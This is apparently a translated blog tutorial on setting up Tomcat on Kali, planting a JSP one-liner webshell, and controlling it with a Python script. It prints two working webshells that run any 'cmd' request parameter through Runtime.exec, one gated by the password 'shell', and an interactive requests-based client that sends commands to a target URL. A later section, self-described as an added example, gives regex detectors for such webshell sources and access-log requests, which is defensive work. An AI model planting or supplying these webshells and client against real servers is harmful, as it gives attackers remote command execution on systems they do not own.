First, Tomcat has to be installed.
Go to the official website http://tomcat.apache.org/ and download the corresponding Linux edition.
Here I downloaded apache-tomcat-8.5.70.tar.gz.
It is best to install JDK 1.8 in advance, because the JDK that ships with Kali may cause problems.
This is the problem I ran into; I made a note of it here:
https://blog.csdn.net/weixin_45254208/article/details/119897865
But you don't have to reinstall the JDK up front; you can wait until something goes wrong, since your machine may not have the same situation as mine.
OK, back to the installation of Tomcat.
Extract the downloaded installation package:
tar -zxvf apache-tomcat-8.5.70.tar.gz
Move the extracted directory under /usr/local/.
Then open the profile with vim /etc/profile
to configure the environment variables (prefix the command with sudo if your permissions are insufficient).
Add the following environment variable line at the bottom of the file:
export CATALINA_HOME=/usr/local/software/tomcat8.5.70
Run source /etc/profile
so that the configuration takes effect immediately.
Go into the bin directory of the Tomcat installation and run ./startup.sh;
seeing the prompt shown in the figure indicates that the startup succeeded.
Now for the main point; the previous steps were only installation and configuration.
Under the Tomcat directory /usr/local/apache-tomcat-8.5.70/webapps/ROOT,
write a JSP one-liner webshell named shell.jsp,
as shown in the figure below (I had written it in advance).
The simplest JSP one-liner has the following content:
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
However, I use a different webshell, which is a little longer.
<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>One-liner webshell</title>
</head>
<body>
<%
    if ("shell".equals(request.getParameter("pwd"))) {
        java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int len = -1;
        byte[] bytes = new byte[4092];
        out.print("<pre>");
        while ((len = input.read(bytes)) != -1) {
            out.println(new String(bytes, "GBK"));
        }
        out.print("</pre>");
    }
%>
</body>
</html>
Here, shell is the connection password, and the variable cmd receives the command to run.
I verified this on my own Windows machine.
However, since the title says "connect with Python", I of course can't leave that out.
The code is actually very simple: it does nothing more than use Python's requests library to send a request, pass the parameters, and have the command executed.
import requests

url = input('Target URL: ')            # e.g. http://192.168.223.130:8080/shell.jsp
pwd = input('Connection password: ')   # the value the JSP compares against (shell)
while True:
    cmd = input('Command to execute: ')
    # Pass the command to the JSP one-liner webshell
    payload = {
        'pwd': pwd,
        'cmd': cmd
    }
    # Send a POST request to the target URL
    response = requests.post(url=url, params=payload)
    # Echo the result of the command execution
    print(response.text)
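From the defender's side, the two things worth noticing about the pages above are that both webshells feed a request parameter straight into Runtime.exec, and that the client sends pwd and cmd via params=, so they travel in the query string and are recorded by Tomcat's default access log (whose pattern logs the full request line). The following Python is an added example, not code from the original post: it flags JSP sources containing that exec-from-parameter pattern and flags .jsp requests in access-log lines that carry a cmd parameter. The JSP sources, file names other than shell.jsp, and log lines are constructed for the example.

```python
import re

# Constructed sample JSP sources (not taken from any real server).
SAMPLE_JSP = {
    "ROOT/shell.jsp": '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>',
    "ROOT/index.jsp": '<%@ page contentType="text/html" %><html><body>Hello</body></html>',
    "ROOT/admin.jsp": (
        '<% if ("shell".equals(request.getParameter("pwd"))) {\n'
        '  Runtime.getRuntime().exec(request.getParameter("cmd")); } %>'
    ),
}

# Constructed Tomcat access-log lines in the default "common" pattern (%h %l %u %t "%r" %s %b).
SAMPLE_LOG = """\
192.168.223.1 - - [01/Sep/2021:10:00:01 +0800] "GET /index.jsp HTTP/1.1" 200 512
192.168.223.1 - - [01/Sep/2021:10:00:07 +0800] "POST /shell.jsp?pwd=shell&cmd=whoami HTTP/1.1" 200 23
192.168.223.1 - - [01/Sep/2021:10:00:09 +0800] "GET /static/app.js?v=3 HTTP/1.1" 200 4090
"""

# Runtime.exec fed directly from a request parameter: the signature shared by both webshells above.
EXEC_FROM_REQUEST = re.compile(
    r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\([^;]*request\.getParameter"
)
# Request line of the common log format: method, path, optional query string, protocol.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>[^? ]+)(?:\?(?P<query>[^ ]*))? HTTP/[^"]*"')


def find_webshell_sources(files):
    """Return the names of JSP files that pass a request parameter straight to Runtime.exec."""
    return sorted(name for name, src in files.items() if EXEC_FROM_REQUEST.search(src))


def find_suspicious_requests(log_text, flagged_params=("cmd",)):
    """Return (path, query) for .jsp requests whose query string carries a flagged parameter name."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m or not m.group("path").endswith(".jsp") or not m.group("query"):
            continue
        keys = {kv.split("=", 1)[0] for kv in m.group("query").split("&")}
        if keys & set(flagged_params):
            hits.append((m.group("path"), m.group("query")))
    return hits


if __name__ == "__main__":
    print("JSP files calling Runtime.exec on a request parameter:", find_webshell_sources(SAMPLE_JSP))
    print("Access-log requests carrying a cmd parameter:", find_suspicious_requests(SAMPLE_LOG))
```

Had the client used data= instead of params=, the parameters would sit in the POST body and the access log alone would not show them; the source scan still would.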
The result is as follows:
Building on this, you could go a little deeper and eventually develop a webshell connection management tool; it is not impossible.
If this article is useful to you, feel free to bookmark it.